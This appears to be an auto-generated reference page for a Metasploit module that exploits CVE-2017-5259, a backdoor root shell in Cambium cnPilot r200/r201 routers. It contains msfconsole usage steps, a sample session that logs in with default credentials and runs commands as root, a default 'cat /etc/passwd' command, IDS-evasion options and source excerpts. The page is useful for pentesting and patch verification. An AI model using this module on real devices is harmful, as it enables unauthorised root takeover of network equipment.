Cambium cnPilot r200/r201 Command Execution as 'root' - Metasploit


This page contains detailed information about how to use the auxiliary/admin/http/cnpilot_r_cmd_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cambium cnPilot r200/r201 Command Execution as 'root'
Module: auxiliary/admin/http/cnpilot_r_cmd_exec
Source code: modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb
Disclosure date: -
Last modification time: 2019-08-15 18:10:44 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-5259

Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is accessible via a specific url, to any authenticated user. The module uses this shell to execute arbitrary system commands as 'root'.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/admin/http/cnpilot_r_cmd_exec
msf auxiliary(cnpilot_r_cmd_exec) > show options
    ... show and set options ...
msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS ip-range
msf auxiliary(cnpilot_r_cmd_exec) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain an undocumented, backdoor 'root' shell. This shell is accessible via a specific url, to any authenticated user. The module uses this shell to execute arbitrary system commands as 'root'.

Verification Steps


  1. Do: use auxiliary/scanner/http/cnpilot_r_cmd_exec
  2. Do: set RHOSTS [IP]
  3. Do: set RPORT [PORT]
  4. Do: set CMD [command]
  5. Do: run

Scenarios


msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS 1.3.3.7
msf auxiliary(cnpilot_r_cmd_exec) > set RPORT 80
msf auxiliary(cnpilot_r_cmd_exec) > set CMD uname -a
msf auxiliary(cnpilot_r_cmd_exec) > run

[+] 1.3.3.7:80 - Cambium cnPilot confirmed...
[*] 1.3.3.7:80 - Attempting to login...
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "user":"user"
[*] 1.3.3.7:80 - Checking backdoor 'root' shell...
[+] 1.3.3.7:80 - You can access the 'root' shell at: http://1.3.3.7:80/adm/syscmd.asp
[+] 1.3.3.7:80 - Executing command - uname -a
[+]
Linux cnPilot-R201 2.6.36 #1 Thu Feb 9 03:02:39 CST 2017 mips unknown


[+] File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Go back to menu.

Msfconsole Usage


Here is how the admin/http/cnpilot_r_cmd_exec auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/http/cnpilot_r_cmd_exec

msf6 auxiliary(admin/http/cnpilot_r_cmd_exec) > show info

       Name: Cambium cnPilot r200/r201 Command Execution as 'root'
     Module: auxiliary/admin/http/cnpilot_r_cmd_exec
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Karn Ganeshen <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CMD       cat /etc/passwd  yes       Command(s) to run
  PASSWORD  admin            no        A specific password to authenticate with
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     80               yes       The target port (TCP)
  SSL       false            no        Negotiate SSL/TLS for outgoing connections
  THREADS   1                yes       The number of concurrent threads (max one per host)
  TIMEOUT   10               yes       HTTP connection timeout
  USERNAME  admin            no        A specific username to authenticate as
  VERBOSE   true             yes       Whether to print output for all attempts
  VHOST                      no        HTTP server virtual host

Description:
  Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to 
  4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell 
  is accessible via a specific url, to any authenticated user. The 
  module uses this shell to execute arbitrary system commands as 
  'root'.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-5259
  https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities

Module Options


This is a complete list of options available in the admin/http/cnpilot_r_cmd_exec auxiliary module:

msf6 auxiliary(admin/http/cnpilot_r_cmd_exec) > show options

Module options (auxiliary/admin/http/cnpilot_r_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       cat /etc/passwd  yes       Command(s) to run
   PASSWORD  admin            no        A specific password to authenticate with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   TIMEOUT   10               yes       HTTP connection timeout
   USERNAME  admin            no        A specific username to authenticate as
   VERBOSE   true             yes       Whether to print output for all attempts
   VHOST                      no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the admin/http/cnpilot_r_cmd_exec auxiliary module:

msf6 auxiliary(admin/http/cnpilot_r_cmd_exec) > show advanced

Module advanced options (auxiliary/admin/http/cnpilot_r_cmd_exec):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   MaxGuessesPerService  0                                                   no        Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
   MaxGuessesPerUser     0                                                   no        Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22
                                                                                        is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be use
                                                                                       d.
   MaxMinutesPerService  0                                                   no        Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
   PASSWORD_SPRAY        false                                               yes       Reverse the credential pairing order. For each password, attempt every possible user.
   REMOVE_PASS_FILE      false                                               yes       Automatically delete the PASS_FILE on module completion
   REMOVE_USERPASS_FILE  false                                               yes       Automatically delete the USERPASS_FILE on module completion
   REMOVE_USER_FILE      false                                               yes       Automatically delete the USER_FILE on module completion
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   TRANSITION_DELAY      0                                                   no        Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/http/cnpilot_r_cmd_exec module can do:

msf6 auxiliary(admin/http/cnpilot_r_cmd_exec) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/http/cnpilot_r_cmd_exec auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/http/cnpilot_r_cmd_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Command run did not return any results or invalid command. Note that cnPilot devices only have a restricted *nix command-set.


Here is a relevant code snippet related to the "Command run did not return any results or invalid command. Note that cnPilot devices only have a restricted *nix command-set." error message:

105:	
106:	      html = Nokogiri::HTML(res.body)
107:	      search_result = html.search('textarea').text
108:	
109:	      if search_result.nil?
110:	        print_status('Command run did not return any results or invalid command. Note that cnPilot devices only have a restricted *nix command-set.')
111:	      else
112:	        print_good("#{search_result}")
113:	
114:	        # w00t we got l00t
115:	        loot_name = 'cmd-exec-log'

<RHOST>:<RPORT> - Backdoor 'root' shell not found. Affected versions are - v4.2.3-R4 and newer. You can try to verify the shell at <ROOT_SHELL>


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Backdoor 'root' shell not found. Affected versions are - v4.2.3-R4 and newer. You can try to verify the shell at <ROOT_SHELL>" error message:

118:	        data = "#{search_result}"
119:	        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
120:	        print_good("File saved in: #{p}")
121:	      end
122:	    else
123:	      print_error("#{rhost}:#{rport} - Backdoor 'root' shell not found. Affected versions are - v4.2.3-R4 and newer. You can try to verify the shell at #{root_shell}")
124:	      return
125:	    end
126:	  end
127:	
128:	  #

<RHOST>:<RPORT> - This software version is not vulnerable. Affected versions are - v4.2.3-R4 and newer.


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - This software version is not vulnerable. Affected versions are - v4.2.3-R4 and newer." error message:

132:	  def run_login
133:	    cookie, cnpilot_version = do_login(datastore['USERNAME'], datastore['PASSWORD'])
134:	    if cookie == 'skip' && cnpilot_version == 'skip'
135:	      return
136:	    elsif ['4.2.3-R4', '4.3.1-R1', '4.3.2-R4', '4.3.3-R4'].include?(cnpilot_version.to_s)
137:	      cmd_exec_run(cookie)
138:	    else
139:	      vprint_error("#{rhost}:#{rport} - This software version is not vulnerable. Affected versions are - v4.2.3-R4 and newer.")
140:	    end
141:	  end
142:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Karn Ganeshen <KarnGaneshen[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.